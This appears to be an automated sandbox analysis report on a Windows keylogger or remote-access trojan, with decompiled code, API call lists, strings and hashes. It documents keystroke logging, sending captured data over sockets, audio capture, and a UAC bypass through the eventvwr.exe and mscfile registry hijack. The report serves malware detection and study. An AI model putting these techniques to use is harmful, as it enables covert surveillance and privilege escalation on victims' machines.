                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				_t46 = malloc(_t25 + 0x64);
                                        				_t33 = _v20.wYear & 0x0000ffff;
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
                                        				_t34 = sprintf(_t46, _t33);
                                        				if( *((char*)(_t47 + 0x3c)) != 0) {
                                        					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                        				}
                                        				if( *((char*)(_t47 + 0x3d)) != 0) {
                                        					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                        					_t20 = _t47 + 0x34; // 0x0
                                        					_t34 = SetEvent( *_t20);
                                        				}
                                        				free(_t46);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _t34;
                                        			}

                                        APIs
                                        • GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                        • malloc.MSVCRT ref: 00405E37
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                        • sprintf.MSVCRT ref: 00405E69
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                        • SetEvent.KERNEL32(00000000), ref: 00405E95
                                        • free.MSVCRT(00000000), ref: 00405E9C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                        • API String ID: 2201004561-248792730
                                        • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                        • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                        • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                        • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                        • send.WS2_32(?,00000000), ref: 004024BB
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                        • send.WS2_32(?,00000000), ref: 004024FF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                        • String ID: [DataStart]
                                        • API String ID: 1403384299-3852763199
                                        • Opcode ID: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                        • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                        • Opcode Fuzzy Hash: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                        • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                        • closesocket.WS2_32 ref: 00401266
                                        • ExitThread.KERNEL32 ref: 00401274
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,Function_0001B310,00000000), ref: 0040129D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,Function_0001B310,00000000), ref: 004012B3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                        • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                        • String ID:
                                        • API String ID: 3470141593-0
                                        • Opcode ID: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                        • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                        • Opcode Fuzzy Hash: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                        • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E00402637(void* __ecx, intOrPtr _a4) {
                                        				char _v5;
                                        				struct _SYSTEMTIME _v24;
                                        				char _v40;
                                        				char _v56;
                                        				char* _t42;
                                        				char* _t43;
                                        				char* _t50;
                                        				char* _t51;
                                        				void* _t68;
                                        				void* _t69;
                                        
                                        				_t68 = __ecx;
                                        				if( *((char*)(__ecx + 0x38)) == 0) {
                                        					return 0;
                                        				}
                                        				if( *0x41bcac != 0) {
                                        					if( *((char*)(__ecx + 0x44)) != 0) {
                                        						GetLocalTime( &_v24);
                                        						_t50 =  &_v5;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                        						_t51 =  &_v40;
                                        						L00414170();
                                        						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
                                        						printf(_t51);
                                        						_t69 = _t69 + 0x24;
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
                                        					}
                                        					_t16 = _t68 + 0x3c; // 0x0
                                        					if( *_t16 != _a4) {
                                        						GetLocalTime( &_v24);
                                        						_t42 =  &_v5;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                        						_t43 =  &_v56;
                                        						L00414170();
                                        						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
                                        						printf(_t43);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					}
                                        				}
                                        				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
                                        				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
                                        				return 1;
                                        			}


                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                        • printf.MSVCRT ref: 004026B5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                        • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                        • printf.MSVCRT ref: 00402722
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                        • API String ID: 1710008465-2297210016
                                        • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                        • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                        • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                        • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,?), ref: 0040318F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                        • exit.MSVCRT ref: 004031D8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                        Strings
                                        • mscfile\shell\open\command, xrefs: 0040311C
                                        • Software\Classes\mscfile\shell\open\command, xrefs: 0040319B
                                        • origmsc, xrefs: 00403160
                                        • eventvwr.exe, xrefs: 004031A6
                                        • C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, xrefs: 0040318A
                                        • open, xrefs: 004031C6
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                        • String ID: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                        • API String ID: 2587331422-359111282
                                        • Opcode ID: ab8c026c616f89140a8e0c9c5cf730ebb06390fe504552328b2b6a206b9bb02a
                                        • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                        • Opcode Fuzzy Hash: ab8c026c616f89140a8e0c9c5cf730ebb06390fe504552328b2b6a206b9bb02a
                                        • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                          • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                          • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                          • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        • C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, xrefs: 0040D752
                                        • open, xrefs: 0040D70B
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                        • String ID: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$open
                                        • API String ID: 2112629403-1846506323
                                        • Opcode ID: bfc1775c8f745b7d6fcee80a42c2b94f25023e4fd720e9b865f493a23bd22e86
                                        • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                        • Opcode Fuzzy Hash: bfc1775c8f745b7d6fcee80a42c2b94f25023e4fd720e9b865f493a23bd22e86
                                        • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetKeyboardLayoutNameA.USER32 ref: 0040D9AF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                          • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
